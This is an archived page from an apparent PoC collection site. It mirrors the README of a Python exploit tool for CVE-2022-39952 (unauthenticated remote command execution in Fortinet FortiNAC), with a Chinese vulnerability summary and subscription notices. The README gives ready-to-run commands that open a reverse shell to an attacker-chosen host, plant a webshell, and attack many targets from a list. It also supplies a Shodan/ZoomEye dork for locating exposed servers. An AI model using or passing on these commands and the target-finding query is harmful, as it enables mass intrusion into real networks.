目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1000

100.0%

CVE-2022-39952 PoC — Fortinet FortiNAC 安全漏洞

来源
关联漏洞
标题:Fortinet FortiNAC 安全漏洞 (CVE-2022-39952)
Description:Fortinet FortiNAC是美国飞塔(Fortinet)公司的一种零信任访问解决方案。 Fortinet FortiNAC存在安全漏洞。攻击者利用该漏洞通过特制的HTTP请求执行未经授权的代码或命令。以下版本受到影响:9.4.0版本、9.2.0版本至9.2.5版本、9.1.0版本至9.1.7版本、8.8.0版本至8.8.11版本、8.7.0版本至8.7.6版本、8.6.0版本至8.6.5版本、8.5.0版本至8.5.4版本、8.3.7版本。
Description
PoC for CVE-2022-39952 affecting Fortinet FortiNAC.
介绍
# FortiNAC CVE-2022-39952

## PoC for CVE-2022-39952 affecting Fortinet FortiNAC.

> This exploit allows an attacker to execute arbitrary commands on the FortiNAC server. It is based on the PoC developed by [horizon3ai](https://github.com/horizon3ai/CVE-2022-39952), with additional options for targeting multiple hosts.

> Disclaimer: This exploit is for educational purposes only. Please use responsibly and with permission.

## Usage:

```bash
usage: exploit.py [-h] [-t TARGET] [-l LIST] [-lh LHOST] [-lp LPORT]

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        The IP address of the target
  -l LIST, --list LIST  List of targets
  -lh LHOST, --lhost LHOST
                        The local host for the reverse shell
  -lp LPORT, --lport LPORT
                        The local port for the reverse shell
```

To use this exploit, you must have Python 3.x installed on your system.

## Requirements:
    Python 3.x
    requests module
    concurrent.futures module

## Examples:

### Execute a reverse shell on a single target:
```bash
$ python exploit.py -t 192.168.1.100 -lh 192.168.1.10 -lp 4444
```

### Execute a webshell on a single target:
```
$ python exploit.py -t 192.168.1.100
```

### Execute a webshell on multiple targets from a list:
```bash
$ python exploit.py -l targets.txt
```

## Note:

>This exploit has only been tested on a limited number of targets, so its effectiveness may vary. The dork for finding potential targets on ZoomEye and Shodan is:

`title:"FortiNAC" +"JSESSIONID"`
文件快照

[4.0K] /data/pocs/89c80c88793f70a45d9cd1ba9bc79d69e95e134f ├── [5.8K] exploit.py └── [1.5K] README.md 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →